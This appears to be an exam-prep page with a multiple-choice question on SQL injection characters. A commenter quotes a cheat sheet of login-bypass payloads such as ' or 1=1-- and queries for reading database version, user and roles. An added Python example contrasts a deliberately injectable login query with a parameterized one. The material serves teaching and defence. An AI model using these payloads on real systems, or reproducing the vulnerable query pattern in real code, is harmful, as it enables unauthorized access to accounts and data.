PrepAway - Latest Free Exam Questions & Answers

Which of the following is not the SQL injection attack character?


A. $

B. PRINT

C. #

D. @@variable

7 Comments on “Which of the following is not the SQL injection attack character?”

  1. Q says:

    A is the correct answer.

    We don’t use $ (dollar sign) to make up the SQL Injection payload.

    The following is derived from “MySQL SQL Injection Cheat Sheet.”

    ======

    Login Notes

    Bypassing Login Screens: SQL Injection 101, Login tricks
    admin' --
    admin' #
    admin'/*
    ' or 1=1--
    ' or 1=1#
    ' or 1=1/*
    ') or '1'='1--
    ') or ('1'='1--

    ======

    Initial Exploitation

    Version: SELECT @@VERSION
    Current User: SELECT user_name();
    SELECT system_user;
    SELECT user;
    SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
    Current Database: SELECT db_name()

    ======

    Privileges

    IS_MEMBER()
    The function indicates whether the current user is a member of the specified Microsoft Windows group or SQL Server database role.

    IF IS_MEMBER ('db_owner') = 1
    PRINT 'Current user is a member of the db_owner role'

    IS_SRVROLEMEMBER()
    Indicates whether a SQL Server login is a member of the specified fixed server role.

    IF IS_SRVROLEMEMBER ('sysadmin') = 1
    PRINT 'Current user''s login is a member of the sysadmin role'
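The comment above lists the characters that matter (the quote and the comment markers) and the one that does not ($). The following added example, not part of the original page or the cheat sheet it quotes, shows the difference in a SQLite-backed login check: the `users` table, its single row and the function names are constructed for the demonstration. The concatenated query lets `'` and `--` become SQL syntax, the parameterized query keeps every character of the input as data, and `$` changes nothing in either case.

```python
import sqlite3


def make_db():
    # Constructed in-memory table with one sample account (assumption,
    # not data from the page).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    return conn


def login_vulnerable(conn, username, password):
    # String concatenation: a quote closes the literal early and a
    # comment marker (-- in SQLite) discards the rest of the WHERE
    # clause, so the query structure is controlled by the input.
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    # Bound parameters: the driver hands the values to the engine
    # separately from the SQL text, so no character in them (quote,
    # comment marker, @@ or $) can alter the statement.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def compare(username, password):
    # Returns (vulnerable_result, parameterized_result) for one input pair.
    conn = make_db()
    return (login_vulnerable(conn, username, password),
            login_parameterized(conn, username, password))
```

Run `compare("' or 1=1--", "x")` and `compare("$", "x")` to see that only the quote-and-comment input changes the outcome, and only in the concatenated version.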
